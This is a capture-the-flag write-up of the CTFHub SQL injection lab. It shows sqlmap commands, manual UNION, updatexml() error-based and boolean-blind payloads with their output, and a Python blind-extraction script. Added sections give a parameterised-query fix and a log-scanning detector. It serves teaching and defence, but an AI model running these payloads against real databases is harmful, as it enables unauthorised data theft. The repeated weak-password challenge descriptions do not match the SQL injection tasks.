CTFHub writeup: web SQL injection (complete edition)
Introduction: a record of the solving process.
1. Integer-type injection
Challenge description: a password that is easy for others (who may know you well) to guess, or that cracking tools can break, is generally considered a weak password.
Method 1: sqlmap injection
Nothing beats sqlmap for convenience; just scan directly:
<1>. Use sqlmap to dump the current database
python sqlmap.py -u ":10080/?id=1" --current-db
[16:29:30] [INFO] fetching current database
current database: 'sqli'
sqlmap reveals the database name: sqli
<2>. Use sqlmap to list all table names in the given database
python sqlmap.py -u ":10080/?id=1" -D sqli --tables
[16:30:07] [INFO] retrieved: 'news'
[16:30:08] [INFO] retrieved: 'flag'
Database: sqli
[2 tables]
+------+
| flag |
| news |
+------+
sqlmap reveals the table names: flag, news
<3>. Use sqlmap to list all column names of the given table
python sqlmap.py -u ":10080/?id=1" -D sqli -T flag --columns
Database: sqli
Table: flag
[1 column]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| flag   | varchar(100) |
+--------+--------------+
sqlmap reveals the column name: flag
<4>. Use sqlmap to dump the values stored in the given column of the table
python sqlmap.py -u ":10080/?id=1" -D sqli -T flag -C flag --dump
Flag obtained:
Database: sqli
Table: flag
[1 entry]
+----------------------------------+
| flag                             |
+----------------------------------+
| ctfhub{c738d407d82740b4fa840800} |
+----------------------------------+
Method 2: manual injection
<1>. Use order by n to find the number of columns
1 order by 2
select * from news where id=1 order by 2
ID: 1
Data: ctfhub
<2>. Use a union query to find where the output is echoed
id=-1 union select 1,2
select * from news where id=-1 union select 1,2
ID: 1
Data: 2
<3>. Get the current database name
id=-1 union select 1,database()
select * from news where id=-1 union select 1,database()
ID: 1
Data: sqli
<4>. Query the table names in database sqli
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
select * from news where id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
ID: 1
Data: news,flag
<5>. Get all column names of the flag table
-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'
<6>. Get the contents of the column in the table of the given database
-1 union select 1,group_concat(flag) from sqli.flag
select * from news where id=-1 union select 1,group_concat(flag) from sqli.flag
ID: 1
Data: ctfhub{9e78719b9f362a4058891f1f}
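The integer-type query above is exploitable because the id value is pasted straight into the SQL text. As an added example that is not part of the original writeup, the following Python code rebuilds a stand-in of the news/flag schema in an in-memory SQLite database (an assumption; the challenge itself runs MySQL) and contrasts the concatenated query with a version that validates the id and binds it as a parameter, which is the fix a developer would ship.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the challenge schema; the table and
    # column names follow the writeup, the flag value is a placeholder.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER, data TEXT);
        INSERT INTO news VALUES (1, 'ctfhub'), (2, 'other');
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('ctfhub{constructed_placeholder}');
    """)
    return db


def lookup_vulnerable(db, user_id):
    # Mirrors the challenge: the id parameter becomes part of the SQL string,
    # so a UNION in the parameter is executed as SQL.
    sql = "select * from news where id=" + user_id
    return db.execute(sql).fetchall()


def lookup_hardened(db, user_id):
    # Reject anything that is not an integer before it reaches the database,
    # then bind it as a parameter so it can only ever be a value, never SQL.
    try:
        id_value = int(user_id)
    except ValueError:
        return None  # the caller should answer 400 instead of running a query
    return db.execute("select * from news where id=?", (id_value,)).fetchall()


# The same UNION payload the writeup uses, pointed at the stand-in flag table.
PAYLOAD = "-1 union select 1,group_concat(flag) from flag"

if __name__ == "__main__":
    db = make_db()
    print("normal request  :", lookup_vulnerable(db, "1"))
    print("vulnerable query:", lookup_vulnerable(db, PAYLOAD))
    print("hardened query  :", lookup_hardened(db, PAYLOAD))
```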
2. Character-type injection
Challenge description: a password that is easy for others (who may know you well) to guess, or that cracking tools can break, is generally considered a weak password.
Method 1: sqlmap injection
Exactly the same as [Method 1: sqlmap injection] under [Integer-type injection]
Flag obtained:
ctfhub{c738d407d82740b4fa840800}
Method 2: manual injection
<1>. Use order by n to find the number of columns
1' order by 2#
select * from news where id='1' order by 2#'
ID: 1
Data: ctfhub
<2>. Use a union query to find where the output is echoed
-1' union select 1,2#
select * from news where id='-1' union select 1,2#'
ID: 1
Data: 2
<3>. Get the current database name
-1' union select 1,database()#
select * from news where id='-1' union select 1,database()#'
ID: 1
Data: sqli
<4>. Query the table names in database sqli
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#
select * from news where id='-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#'
ID: 1
Data: news,flag
<5>. Get all column names of the flag table
-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'#
<6>. Get the contents of the column in the table of the given database (obtain the flag)
-1' union select 1,group_concat(flag) from sqli.flag#
select * from news where id='-1' union select 1,group_concat(flag) from sqli.flag#'
ID: 1
Data: ctfhub{d377c961dd1502e2343960ef}
3. Error-based injection
Method 1: sqlmap injection
Exactly the same as [Method 1: sqlmap injection] under [Integer-type injection]
python sqlmap.py -u ":10080/?id=-1" -D sqli -T flag -C flag --dump
Database: sqli
Table: flag
[1 entry]
+----------------------------------+
| flag |
+----------------------------------+
| ctfhub{74a09bf882367b22ea960956} |
+----------------------------------+
Method 2: manual injection
<1>. Query the database currently in use:
-1 union select updatexml(1, concat(0x7e,database(),0x7e),1)
select * from news where id=1 union select updatexml(1, concat(0x7e,database(),0x7e),1)
查询错误: XPATH syntax error: '~sqli~'
<2>. Query the database's table names:
-1 union select updatexml(1, concat(0x7e,(select(group_concat(table_name)) from information_schema.tables where table_schema="sqli"),0x7e),1)
select * from news where id=-1 union select updatexml(1, concat(0x7e,(select(group_concat(table_name)) from information_schema.tables where table_schema="sqli"),0x7e),1)
查询错误: XPATH syntax error: '~news,flag~'
<3>. Get the table's column names:
-1 union select updatexml(1, concat(0x7e,(select(group_concat(column_name)) from information_schema.columns where table_schema='sqli' and table_name='flag'),0x7e),1)
select * from news where id=-1 union select updatexml(1, concat(0x7e,(select(group_concat(column_name)) from information_schema.columns where table_schema='sqli' and table_name='flag'),0x7e),1)
查询错误: XPATH syntax error: '~flag~'
<4>. Get the contents of the column in the table of the given database (obtain the flag):
-1 union select updatexml(1, concat(0x7e,(select(group_concat(flag)) from sqli.flag),0x7e),1)
select * from news where id=-1 union select updatexml(1, concat(0x7e,(select(group_concat(flag)) from sqli.flag),0x7e),1)
查询错误: XPATH syntax error: '~ctfhub{74a09bf882367b22ea960956'
<5>. The error message truncates the output, so add the closing } to get the flag:
ctfhub{74a09bf882367b22ea960956}
4. Boolean-based blind injection
Method 1: sqlmap injection
Exactly the same as [Method 1: sqlmap injection] under [Integer-type injection]
python sqlmap.py -u ":10080/?id=1" -D sqli -T flag -C flag --dump
[20:02:24] [ERROR] invalid character detected. retrying..
[20:02:24] [WARNING] increasing time delay to 2 seconds
hub{aa7bab6b0dd1a301df6a345d}
Database: sqli
Table: flag
[1 entry]
+----------------------------------+
| flag |
+----------------------------------+
| ctfhub{aa7bab6b0dd1a301df6a345d} |
+----------------------------------+
Method 2: scripted injection (adapted from a reference)
The Python script is as follows; swap in the payload and it can be used to test:
import requests


class InjeSql(object):
    def __init__(self, url, payload_length, payload_Data, name, conditions, name_length, max_len=12):
        self.url = url
        self.payload_length = payload_length  # payload template for guessing the length (one %d slot)
        self.payload_Data = payload_Data      # payload template for guessing one character (%d and %s slots)
        self.max_len = max_len  # upper bound on the length of the database name, table name, etc.
        self.name = name  # label for the value being extracted, e.g. the database name
        self.conditions = conditions  # text present in the response when the injected condition is true
        self.name_length = name_length

    def getLength(self):
        for i in range(1, self.max_len):
            payload = self.payload_length % i
            r = requests.get(self.url + payload + '%23')  # %23 is the URL-encoded '#' comment
            if self.conditions in r.text:
                self.name_length = i
                print(self.name + "的长度是", i)
                break

    def getData(self):
        name = ''
        for j in range(1, self.name_length + 1):
            for i in 'abcdefghijklmnopqrstuvwxyz}{0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ':
                url = self.url + self.payload_Data % (j, i)
                r = requests.get(url + '%23')
                if 'query_success' in r.text:  # the challenge page echoes query_success when the condition holds
                    name += i
                    break
        print(self.name, name)
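From the defender's side, the three techniques in this writeup (UNION-based extraction, updatexml() error-based extraction and boolean-blind probing) leave recognisable patterns in the web server's access log. As an added example that is not part of the original writeup, this Python snippet URL-decodes the query string of each request and tags it with the technique it matches; the combined-log-format lines, client address and timestamps are constructed for the example, not captured from the challenge.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the techniques used in this writeup: UNION-based extraction,
# updatexml() error-based extraction, schema enumeration via information_schema,
# and boolean-blind probing with substr()/ascii().
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "error_based_xml": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "boolean_blind": re.compile(r"\b(substr|substring|mid|ascii)\s*\(", re.I),
}

LOG_RE = re.compile(r'"GET (\S+) HTTP')  # assumed combined-log-format request line


def classify(query_string):
    """Return the set of signature names that match a URL-decoded query string."""
    decoded = unquote_plus(query_string)
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}


def scan_log(lines):
    """Return (request path, sorted signature names) for every flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        path = m.group(1)
        tags = classify(path.partition("?")[2])
        if tags:
            hits.append((path, sorted(tags)))
    return hits


# Constructed sample log lines (not from the challenge server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=-1%20union%20select%201,'
    'group_concat(table_name)%20from%20information_schema.tables%20where%20'
    'table_schema=%27sqli%27 HTTP/1.1" 200 530',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?id=-1%20union%20select%20'
    'updatexml(1,concat(0x7e,database(),0x7e),1) HTTP/1.1" 200 498',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /?id=1%20and%20'
    'ascii(substr(database(),1,1))%3E100 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for path, tags in scan_log(SAMPLE_LOG):
        print(path, "->", ", ".join(tags))
```

The plain `/?id=1` request is not flagged, while the three probes are each tagged with the technique they use, which is the behaviour a WAF rule or SIEM query built from these patterns should reproduce.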